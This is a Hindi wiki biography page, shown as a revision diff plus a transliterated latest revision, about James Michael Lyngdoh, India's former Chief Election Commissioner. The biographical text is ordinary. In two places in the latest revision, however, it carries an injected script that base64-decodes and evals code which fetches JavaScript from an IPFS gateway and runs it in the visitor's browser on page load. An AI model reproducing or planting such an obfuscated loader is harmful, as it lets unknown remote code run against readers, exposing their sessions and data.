Difference between revisions of "जेम्स माइकल लिंगदोह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 30: Line 30:
 
|शीर्षक 2=
 
|शीर्षक 2=
 
|पाठ 2=
 
|पाठ 2=
|अन्य जानकारी=इनके कार्यकाल की सबसे बड़ी उपलब्धि [[2002]] में [[जम्मू-कश्मीर]] में निष्पक्ष चुनाव कराना रहा था।
+
|अन्य जानकारी=जेम्स माइकल लिंगदोह के कार्यकाल की सबसे बड़ी उपलब्धि [[2002]] में [[जम्मू-कश्मीर]] में निष्पक्ष चुनाव कराना रहा था।
 
|बाहरी कड़ियाँ=
 
|बाहरी कड़ियाँ=
 
|अद्यतन=1:00, 22 सितम्बर-2012 (IST)
 
|अद्यतन=1:00, 22 सितम्बर-2012 (IST)
 
}}
 
}}
'''जेम्स माइकल लिंगदोह''' (जन्म- [[8 फ़रवरी]], [[1939]], [[मेघालय]]) [[भारत]] के पूर्व '[[मुख्य चुनाव आयुक्त]]' के रूप में प्रसिद्ध हैं। 'जे.एम.' यानी जेम्स माइकल लिंगदोह का नाम भारत के लोकतांत्रिक राजनीतिक इतिहास में बहुत ही ख़ास अहमियत रखता है। [[मेघालय]] के [[खासी जाति|खासी जनजाति]] से सम्बन्ध रखने वाले लिंगदोह [[1961]] में देश की सर्वोच्च नागरिक सेवाओं में से एक '[[भारतीय प्रशासनिक सेवा]]' के लिए चुने गये थे। उन्होंने काफ़ी लंबे समय तक [[बिहार]] कैडर के तहत वहाँ कई ज़िलों में सराहनीय काम किया, लेकिन सही अर्थों में उन्हें प्रसिद्धि मिली, 'मुख्य चुनाव आयुक्त' के रूप में। लिंगदोह ने अपने इस पद पर लगभग तीन वर्ष के कार्यकाल के दौरान कई मुश्किल परिस्थितियों को सफलतापूर्वक पार किया। उनके कार्यकाल की सबसे बड़ी उपलब्धि [[2002]] में जम्मू-कश्मीर में निष्पक्ष चुनाव कराना रहा था, जो किसी बड़ी चुनौती से कम महत्त्वपूर्ण नहीं था। उनके इस कार्य के लिए पूरी दुनिया ने उनकी प्रशंसा की।
+
'''जेम्स माइकल लिंगदोह''' ([[अंग्रेज़ी]]: ''James Michael Lyngdoh'', जन्म- [[8 फ़रवरी]], [[1939]], [[मेघालय]]) [[भारत]] के पूर्व '[[मुख्य चुनाव आयुक्त]]' के रूप में प्रसिद्ध हैं। 'जे.एम.' यानी जेम्स माइकल लिंगदोह का नाम भारत के लोकतांत्रिक राजनीतिक इतिहास में बहुत ही ख़ास अहमियत रखता है। [[मेघालय]] के [[खासी जाति|खासी जनजाति]] से सम्बन्ध रखने वाले लिंगदोह [[1961]] में देश की सर्वोच्च नागरिक सेवाओं में से एक '[[भारतीय प्रशासनिक सेवा]]' के लिए चुने गये थे। उन्होंने काफ़ी लंबे समय तक [[बिहार]] कैडर के तहत वहाँ कई ज़िलों में सराहनीय काम किया, लेकिन सही अर्थों में उन्हें प्रसिद्धि मिली, 'मुख्य चुनाव आयुक्त' के रूप में। लिंगदोह ने अपने इस पद पर लगभग तीन वर्ष के कार्यकाल के दौरान कई मुश्किल परिस्थितियों को सफलतापूर्वक पार किया। उनके कार्यकाल की सबसे बड़ी उपलब्धि [[2002]] में जम्मू-कश्मीर में निष्पक्ष चुनाव कराना रहा था, जो किसी बड़ी चुनौती से कम महत्त्वपूर्ण नहीं था। उनके इस कार्य के लिए पूरी दुनिया ने उनकी प्रशंसा की।
 
==जन्म तथा शिक्षा==
 
==जन्म तथा शिक्षा==
 
8 फरवरी, 1939 को जेम्स माइकल लिंगदोह का जन्म [[मेघालय]] में हुआ था। वह मूलत: आदिवासी खासी क्षेत्र के निवासी थे। लिंगदोह ने अपनी प्रारम्भिक शिक्षा 'सेंट एडमंड्स स्कूल', शिलांग से प्राप्त की थी। [[पिता]] के ज़िला जज होने के कारण इनकी आगे की पूरी शिक्षा देश की राजधानी [[दिल्ली]] के 'सेंट स्टीफ़ेंस कॉलेज' में हुई।
 
8 फरवरी, 1939 को जेम्स माइकल लिंगदोह का जन्म [[मेघालय]] में हुआ था। वह मूलत: आदिवासी खासी क्षेत्र के निवासी थे। लिंगदोह ने अपनी प्रारम्भिक शिक्षा 'सेंट एडमंड्स स्कूल', शिलांग से प्राप्त की थी। [[पिता]] के ज़िला जज होने के कारण इनकी आगे की पूरी शिक्षा देश की राजधानी [[दिल्ली]] के 'सेंट स्टीफ़ेंस कॉलेज' में हुई।
Line 42: Line 42:
 
[[2001]] में उन्हें बारहवाँ 'मुख्य चुनाव आयुक्त' बनाया गया। अपने इस पद पर काम करते हुए लिंगदोह ने दो बेहद कठिन तथा चुनौतीपूर्ण चुनाव दायित्व पूरे किए। पहला मोर्चा [[जम्मू-कश्मीर]] में चुनाव का था और दूसरा [[गुजरात]] का। दोनों में ही लिंगदोह ने निष्पक्ष चुनाव सम्पन्न कराए, जिसके लिए इनके विरोधियों ने भी इनकी सराहना की।
 
[[2001]] में उन्हें बारहवाँ 'मुख्य चुनाव आयुक्त' बनाया गया। अपने इस पद पर काम करते हुए लिंगदोह ने दो बेहद कठिन तथा चुनौतीपूर्ण चुनाव दायित्व पूरे किए। पहला मोर्चा [[जम्मू-कश्मीर]] में चुनाव का था और दूसरा [[गुजरात]] का। दोनों में ही लिंगदोह ने निष्पक्ष चुनाव सम्पन्न कराए, जिसके लिए इनके विरोधियों ने भी इनकी सराहना की।
 
====पुरस्कार====
 
====पुरस्कार====
[[2003]] में जेम्स माइकल लिंगदोह को राजकीय सेवा की श्रेणी में '[[मेग्सेसे पुरस्कार]]' प्रदान किया गया।  
+
[[2003]] में जेम्स माइकल लिंगदोह को राजकीय सेवा की श्रेणी में '[[मेग्सेसे पुरस्कार]]' प्रदान किया गया।
 
 
 
 
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
Line 53: Line 51:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{रेमन मैग्सेसे पुरस्कार}}{{मुख्य चुनाव आयुक्त}}
 
{{रेमन मैग्सेसे पुरस्कार}}{{मुख्य चुनाव आयुक्त}}
[[Category:मुख्य चुनाव आयुक्त]][[Category:भारतीय प्रशासनिक सेवा]]
+
[[Category:मुख्य चुनाव आयुक्त]][[Category:भारतीय प्रशासनिक सेवा]][[Category:चरित कोश]][[Category:रेमन मैग्सेसे पुरस्कार]][[Category:प्रसिद्ध व्यक्तित्व]][[Category:प्रसिद्ध व्यक्तित्व कोश]]
[[Category:चरित कोश]][[Category:रेमन मैग्सेसे पुरस्कार]][[Category:प्रसिद्ध व्यक्तित्व]][[Category:प्रसिद्ध व्यक्तित्व कोश]]
 
 
__INDEX__
 
__INDEX__
__NOTOC__
 

Latest revision as of 05:17, 8 February 2018

jems maikal liangadoh
janm 8 faravari, 1939
janm bhoomi meghalay
nagarikata bharatiy
prasiddhi barahavean mukhy chunav ayukt
vidyalay 'seant edamands skool', (shilaang); 'seant stifeans k aaulej' (dilli)
bhasha hindi, aangrezi
puraskar-upadhi 'reman megsese puraskar'
any janakari jems maikal liangadoh ke karyakal ki sabase b di upalabdhi 2002 mean jammoo-kashmir mean nishpaksh chunav karana raha tha.
adyatan‎ 1:00, 22 sitambar-2012 (IST)

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

jems maikal liangadoh (aangrezi: James Michael Lyngdoh, janm- 8 faravari, 1939, meghalay) bharat ke poorv 'mukhy chunav ayukt' ke roop mean prasiddh haian. 'je.em.' yani jems maikal liangadoh ka nam bharat ke lokataantrik rajanitik itihas mean bahut hi khas ahamiyat rakhata hai. meghalay ke khasi janajati se sambandh rakhane vale liangadoh 1961 mean desh ki sarvochch nagarik sevaoan mean se ek 'bharatiy prashasanik seva' ke lie chune gaye the. unhoanne kafi lanbe samay tak bihar kaidar ke tahat vahaan kee ziloan mean sarahaniy kam kiya, lekin sahi arthoan mean unhean prasiddhi mili, 'mukhy chunav ayukt' ke roop mean. liangadoh ne apane is pad par lagabhag tin varsh ke karyakal ke dauran kee mushkil paristhitiyoan ko saphalatapoorvak par kiya. unake karyakal ki sabase b di upalabdhi 2002 mean jammoo-kashmir mean nishpaksh chunav karana raha tha, jo kisi b di chunauti se kam mahattvapoorn nahian tha. unake is kary ke lie poori duniya ne unaki prashansa ki.

janm tatha shiksha

8 pharavari, 1939 ko jems maikal liangadoh ka janm meghalay mean hua tha. vah moolat: adivasi khasi kshetr ke nivasi the. liangadoh ne apani prarambhik shiksha 'seant edamands skool', shilaang se prapt ki thi. pita ke zila jaj hone ke karan inaki age ki poori shiksha desh ki rajadhani dilli ke 'seant stifeans k aaulej' mean huee.

aee.e.es. adhikari

1981 mean vah 'bharatiy prashasanik seva' (aee.e.es.) ke lie chun liye ge aur liangadoh ne jaldi hi ek sakht prashasak ki chhavi sthapit kar li. sath hi yah bhi spasht dekha gaya ki nyayapriy hote hue unaka jhukav mahattvapoorn netaoan ke mukabale samany nagarikoan ki or adhik raha. apani spasht tatha niyamabaddh karyashaili ke karan inako bahut-si takarahat bhari sthitiyoan ka bhi samana karana p da. lekin liangadoh unake nirvah ke dauran dridhatapoorvak date rahe aur vinamr bhi bane rahe.

mukhy chunav ayukt ka pad

2001 mean unhean barahavaan 'mukhy chunav ayukt' banaya gaya. apane is pad par kam karate hue liangadoh ne do behad kathin tatha chunautipoorn chunav dayitv poore kie. pahala morcha jammoo-kashmir mean chunav ka tha aur doosara gujarat ka. donoan mean hi liangadoh ne nishpaksh chunav sampann karae, jisake lie inake virodhiyoan ne bhi inaki sarahana ki.

puraskar

2003 mean jems maikal liangadoh ko rajakiy seva ki shreni mean 'megsese puraskar' pradan kiya gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh